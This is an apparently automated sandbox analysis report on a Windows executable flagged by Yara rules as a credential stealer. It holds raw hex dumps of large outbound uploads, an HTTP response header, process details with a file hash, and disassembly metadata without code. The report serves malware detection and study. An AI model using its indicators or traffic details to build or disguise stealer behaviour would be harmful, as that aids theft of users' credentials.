                                                                                2024-10-29 14:28:15 UTC15331OUTData Raw: 24 45 7f 50 90 94 9e 3e 67 6e f3 e0 14 73 69 dd 2a 37 cb 14 01 67 b7 bb 85 65 e2 65 33 bc f8 8f 93 fa ee 27 d6 89 21 c5 c2 62 2b 7b 91 8c 63 4e 2e b8 3f 22 b8 8e 98 1e 09 27 5f f9 bf ed 4e d0 96 e5 ff ed 79 48 c0 6a d7 f5 d5 23 00 47 fa 0a 40 40 5b 89 5d 4c 70 7f bf c4 5d e0 cb 06 26 c3 aa 4d 21 ca c2 6a 53 b8 0b c2 cb 0e 34 51 94 01 e1 3d 2f 00 c7 68 68 10 59 26 1c 1e 7a 0c c7 6d 41 8b fe 44 38 c5 d6 3b 12 68 ff 6a 4b da 45 16 e4 2c 52 4f 02 d1 17 bb 49 53 80 eb 2b bc 96 86 08 a4 79 68 eb 28 57 77 95 0e 30 a1 34 5d 0b 29 1d 13 39 ae 3f 5c 94 d8 91 17 68 92 5c ce 12 dc ba 73 ae e0 09 b6 e2 57 22 06 c5 3f cb 87 bf 7f 01 22 2e ee 79 71 b0 3b d9 fa db 9f f2 ad ad 2a 2c d5 68 36 06 56 24 bf e0 cb e8 94 fb 1d f9 87 24 36 3e d6 04 97 44 c3 ff ea 29 80 06 a1 65
                                                                                Data Ascii: $EP>gnsi*7gee3'!b+{cN.?"'_NyHj#G@@[]Lp]&M!jS4Q=/hhY&zmAD8;hjKE,ROIS+yh(Ww04])9?\h\sW"?".yq;*,h6V$$6>D)e
                                                                                2024-10-29 14:28:15 UTC15331OUTData Raw: 91 9d b7 77 70 20 b4 da e1 e5 ee 92 43 10 ab b3 65 47 9d 39 fb 07 6b f4 db 06 29 54 ad 88 3e 54 1a e1 2e b5 84 48 c8 07 80 ca c5 28 5a 43 7d fc b1 1d 06 87 39 73 5f 2d 74 f0 ef 59 b5 4c a5 71 b5 f8 e0 84 0d 6a 57 72 aa 29 66 df b9 f1 c0 7f 78 f3 a8 08 b4 28 82 da 9c 23 1c 04 8a e1 f0 d7 f7 80 56 00 ed d3 8c 57 80 28 f5 a0 ea 7d af 18 8c 38 8a e7 a0 31 c2 fe 06 e5 16 32 55 16 a2 86 dc 66 e3 e1 04 c7 30 92 3d e7 a9 ee 44 e2 a9 8b 08 a8 c3 65 a4 42 56 18 a0 ed 86 96 de 9e 1e 37 dd 33 a0 1e 40 34 66 b2 3a da 5c 3f 43 37 6b ff 5c 97 51 b8 a1 8b f8 ef 2b 49 f6 ea 4a d4 ab 18 58 6b b0 1d 45 ae 23 49 60 7d 79 6a 05 27 4f ec b8 c8 51 33 45 0b f2 da 1f 8c 46 f0 2c 9e d8 fc 40 69 2f 67 19 64 10 9c 08 7b bf d5 c1 f6 ed aa 29 48 06 7a bb 0a 32 e2 18 ef 25 08 37 26 d4
                                                                                Data Ascii: wp CeG9k)T>T.H(ZC}9s_-tYLqjWr)fx(#VW(}812Uf0=DeBV73@4f:\?C7k\Q+IJXkE#I`}yj'OQ3EF,@i/gd{)Hz2%7&
                                                                                2024-10-29 14:28:15 UTC15331OUTData Raw: 56 df 64 08 99 4c e2 ce 80 ec 19 93 16 e1 8b a5 31 d5 a6 08 53 60 12 19 20 31 05 8d 46 b2 d2 eb 42 a7 65 e4 43 bc b7 ce 9b 67 c4 8a d7 7c 1e bb 6b f4 35 46 63 48 61 80 5e fe 5e a8 2a 0d 62 79 bc 1f 18 05 ac e2 d4 e1 f6 59 47 7f c7 d7 6e a9 21 fe 93 1f 4f 96 0c 16 52 2d bd c7 db 9e 8e 47 93 d6 aa 22 c2 2a f3 d9 8b 74 f1 8f 33 82 92 87 97 85 d5 63 27 14 b9 57 cf 70 7b a3 b2 43 1c d9 a4 94 84 a9 19 fd 9f 06 ee 20 9b 3a 96 27 15 27 91 bf e1 82 e7 56 28 1c b1 a4 6b df fa f9 20 27 93 cb d6 31 c8 d4 f0 ec 97 37 5a 5a b8 2e 3c e7 3b 1d eb c2 d2 ea 7b f6 21 bd 5b c2 68 e9 e7 ca f8 cc d8 0a 15 b0 9c 07 3e ee ec 5d 18 b7 6e 5f 99 ee b9 c2 c0 c2 71 b5 74 8b d2 99 4f d9 87 48 9c f0 fa ea 35 e1 28 60 fb bf e7 c6 66 89 83 77 ac 7c 41 94 5d cf 39 97 26 49 07 06 a9 f4 07
                                                                                Data Ascii: VdL1S` 1FBeCg|k5FcHa^^*byYGn!OR-G"*t3c'Wp{C :''V(k '17ZZ.<;{![h>]n_qtOH5(`fw|A]9&I
                                                                                2024-10-29 14:28:15 UTC15331OUTData Raw: ae 9f 4d 4c c3 e2 9c ed 62 1d 46 47 c3 3b 95 2c 74 b3 45 5c f8 f9 ce ba 70 09 5c 03 c5 7b 25 b3 f2 43 0a d5 46 9f 82 0f 07 a8 77 0c 3b 90 24 42 ae e4 e4 0f 74 ad c3 84 46 93 67 e1 6d 87 fd 26 77 49 e4 de 27 4d 12 6a d3 ea c2 72 36 07 a4 0e 66 14 a2 bd 62 de f7 29 a9 66 06 5a f2 1b f3 ba ba 55 a9 f9 9d 4d d6 36 e9 d5 26 fc 60 7e df 6a c7 91 98 40 f6 f1 48 5f fc ba d8 77 68 e9 2c 89 66 06 ad b5 ab 5b 30 13 9f 88 34 e8 d2 f0 7b 2e c8 f3 6a f6 64 6f 40 08 1e db f9 89 4a dd e8 29 a5 4f fc 28 bc 6f 6a e0 45 98 64 eb 3d 5a e5 6c 2f 2f ec 8b f6 f4 e2 fe 84 fb 94 6d 73 ef 36 5a 2a 11 99 f2 4a 8a c7 4c 71 bf 8f 1a bd ab 15 67 c4 15 b8 f0 da c0 6e 55 64 4c f1 d9 ee 16 79 39 67 80 63 61 ba 06 1e 0f 36 1f c6 45 ab a6 79 49 65 53 34 5f 5d 6f 79 f1 9c 14 f8 0c 10 47 81
                                                                                Data Ascii: MLbFG;,tE\p\{%CFw;$BtFgm&wI'Mjr6fb)fZUM6&`~j@H_wh,f[04{.jdo@J)O(ojEd=Zl//ms6Z*JLqgnUdLy9gca6EyIeS4_]oyG
                                                                                2024-10-29 14:28:15 UTC15331OUTData Raw: d5 22 dd 51 7a 72 a2 76 e7 a8 af 76 56 dc 25 e5 dc 16 b9 8e 6a 7b 9d dd d3 4b ba 6d ae 1f 1b bf e1 7b df 7e db 6d 94 a3 b4 66 ee 41 42 54 79 0b ef e3 67 52 0f 72 1c 1a 92 e3 db 95 6f e0 fc d6 46 71 92 4c 60 bb 3d 7e f5 65 7a 09 a5 c8 ef 16 a7 75 74 6a b3 77 25 aa e9 3f 8d 4f fb b0 e6 97 b6 74 62 64 bc c5 50 69 5b aa 11 81 93 fa 81 68 89 74 f1 a2 a3 62 51 f1 97 af 14 d9 d7 59 c6 d9 7a 48 3f fa 76 2f ee 7f 64 65 44 72 93 51 ca c8 c5 02 47 99 29 c1 03 3d 96 0d 3a 56 52 62 39 25 64 a5 c8 86 39 8f a0 ac 4e fd 4f 54 28 c2 0a e9 fd 6e 6b 3e b8 aa 80 fd b2 b8 ff 2b 35 fa 74 d8 45 92 40 7f de 7b f3 c7 32 99 a4 ff e4 5c d7 c6 fd a4 27 d0 83 b1 37 0c 02 f4 cc 31 2a e7 a4 8c 82 d9 73 5f 6a b5 dc aa 9a 45 36 5f 7e 66 20 6b 9b 25 54 15 fd 71 92 43 52 51 86 3b e4 7a b6
                                                                                Data Ascii: "QzrvvV%j{Km{~mfABTygRroFqL`=~ezutjw%?OtbdPi[htbQYzH?v/deDrQG)=:VRb9%d9NOT(nk>+5tE@{2\'71*s_jE6_~f k%TqCRQ;z
                                                                                2024-10-29 14:28:15 UTC15331OUTData Raw: 00 69 cf b3 07 45 33 6a ef c3 43 b8 44 14 4f ec 85 3d 69 ca 88 b3 01 0c 84 ed ae 18 25 de 19 f1 57 2d ae c3 bd b7 ed a1 bb 24 2b 45 99 1f b5 f3 33 3c c5 8d 2c 10 7f 9e 1d d1 4e 7b 80 f8 c1 c6 6b 03 e8 70 a7 87 ce 3f 0b 9d 26 6a c1 6e 44 41 57 10 72 ad 74 08 18 23 2c 44 85 72 ec ca b1 43 48 d5 c0 7f b9 c3 6b f8 4d f0 c3 a4 5b 8e c5 b2 92 24 4e 46 14 82 13 bf eb 46 b5 19 85 8c b0 13 db e5 3f f2 1d 1b 09 af 65 6b b6 cd 06 7e 5e 6e 9c 19 6b 2d 05 17 14 3f e8 58 10 0e 81 8f f7 60 f7 ed 11 77 5e d4 09 2e b5 69 a1 3f 36 9a 1b e9 e4 66 c9 ec fe 78 d4 82 b3 54 a7 de 5f eb 1e 7d 0b b8 3c d9 42 8e b3 eb 46 68 f6 cf c3 32 88 2e d7 b6 a4 a8 3a bb 22 0f 37 1c 34 ec 8e 25 79 d1 e1 18 d3 3d cd 8b 57 26 38 2d 5d d2 cd 51 77 93 ba 54 19 2d d2 29 27 75 d6 cd 7a 5b 8a 16 b4
                                                                                Data Ascii: iE3jCDO=i%W-$+E3<,N{kp?&jnDAWrt#,DrCHkM[$NFF?ek~^nk-?X`w^.i?6fxT_}<BFh2.:"74%y=W&8-]QwT-)'uz[
                                                                                2024-10-29 14:28:53 UTC1022INHTTP/1.1 200 OK
                                                                                Date: Tue, 29 Oct 2024 14:28:53 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=dv8c47j7dlp6nfopsoahm41427; expires=Sat, 22 Feb 2025 08:14:56 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2su55bzddnIx%2BiW5O8%2BMbTnvG8idtx5WSt1VMa9N0oUyIl2MxhYM2cioNCMdIvuylVH5oVoQPtwXsxcGxRL2L5KdxKIlz9Jkq9c2MPx6oHlkEIsRvkmZzZ1ELjanwyOS%2FT241Q4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8da3d9dc6cc96c56-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1170&sent=215&recv=597&lost=0&retrans=0&sent_bytes=2844&recv_bytes=553458&delivery_rate=2458404&cwnd=244&unsent_bytes=0&cid=f93939b5da2f9e18&ts=38227&x=0"


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:10:27:12
                                                                                Start date:29/10/2024
                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                Imagebase:0xfd0000
                                                                                File size:2'964'992 bytes
                                                                                MD5 hash:E8FEBBEE7F62CA4C85F34BCCB279EB67
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1862847814.0000000001487000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Non-executed Functions

                                                                                  Function 014AB84F Relevance: 3.2, Strings: 2, Instructions: 695COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1950914872.0000000001487000.00000004.00000020.00020000.00000000.sdmp, Offset: 01487000, based on PE: false
                                                                                  • Associated: 00000000.00000003.2340811577.0000000001487000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_1487000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: C:\W$C:\W
                                                                                  • API String ID: 0-2549618443
                                                                                  • Opcode ID: 356dcdae9940630e689e1572c087d1da334726962f6e8ad986fbde275b50ae75
                                                                                  • Instruction ID: d10a5f0688f8de4f6c1c024df6b41b1ce2179ce04534988d19ac6562b7401b07
                                                                                  • Opcode Fuzzy Hash: 356dcdae9940630e689e1572c087d1da334726962f6e8ad986fbde275b50ae75
                                                                                  • Instruction Fuzzy Hash: 8322542140E7D48FC7278B748969592BFB0EE2721075E46CFC5C18F9B3E228994AD763
                                                                                  Function 014DED61 Relevance: .7, Instructions: 720COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1897589782.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, Offset: 014DA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_1487000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f219db0c2180ba8c01d2a115b34f446bffaf79651a876a82428fc51bf2641c1f
                                                                                  • Instruction ID: 0d90f134a332b6c923117f46a5eaf576982b6569d0acba4a381f0565e17015c2
                                                                                  • Opcode Fuzzy Hash: f219db0c2180ba8c01d2a115b34f446bffaf79651a876a82428fc51bf2641c1f
                                                                                  • Instruction Fuzzy Hash: 2BD1F06140E7D59FDB038B7489A96A57FB0EF03224B1A46DFC4C58F0B3E224994EC766
                                                                                  Function 014DEDF1 Relevance: .7, Instructions: 656COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1897589782.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, Offset: 014DA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_1487000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 57e47e7fac1c5cb555f30c1572d05c56a31d33705dca18a2029d130cb5835b1b
                                                                                  • Instruction ID: 623c72978320fd2fc72d8ad957ec1de7064af578eeef20389e6dcce338dde659
                                                                                  • Opcode Fuzzy Hash: 57e47e7fac1c5cb555f30c1572d05c56a31d33705dca18a2029d130cb5835b1b
                                                                                  • Instruction Fuzzy Hash: 37C10E6140D7D59FDB038B7488A96A57FB0EF03224B2A46DFC4C58F0B3E235994AC766
                                                                                  Function 014A37F4 Relevance: .2, Instructions: 245COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.2340811577.0000000001487000.00000004.00000020.00020000.00000000.sdmp, Offset: 01487000, based on PE: false
                                                                                  • Associated: 00000000.00000003.1950914872.0000000001487000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_1487000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 28a66057b03ef2f2c07a41a9735bd8124f90a9b76b3bcc7e784949467531d5ac
                                                                                  • Instruction ID: b70efc35d47341d74adbd32eb15dbedb6b9c33876445c898409a36fa1052cf97
                                                                                  • Opcode Fuzzy Hash: 28a66057b03ef2f2c07a41a9735bd8124f90a9b76b3bcc7e784949467531d5ac
                                                                                  • Instruction Fuzzy Hash: 8F81347540A3D1AED703CF34C9A79A2BFA9FE1321475986CED5C14E063E371A11ACB52
                                                                                  Function 01497449 Relevance: .1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.2340811577.0000000001487000.00000004.00000020.00020000.00000000.sdmp, Offset: 01487000, based on PE: false
                                                                                  • Associated: 00000000.00000003.1950914872.0000000001487000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_1487000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f24193477ecd1b712cfbb67819523358227fe270f55fbee1a73888caff6372c4
                                                                                  • Instruction ID: 53e945d48431510a5cef40811891da803f905799b059c70ea37fa22d3cde812b
                                                                                  • Opcode Fuzzy Hash: f24193477ecd1b712cfbb67819523358227fe270f55fbee1a73888caff6372c4
                                                                                  • Instruction Fuzzy Hash: 252100611092D18FD302CF38D494A82BFA1FF8B71A39E40DDC9C18F527C2A56542CB52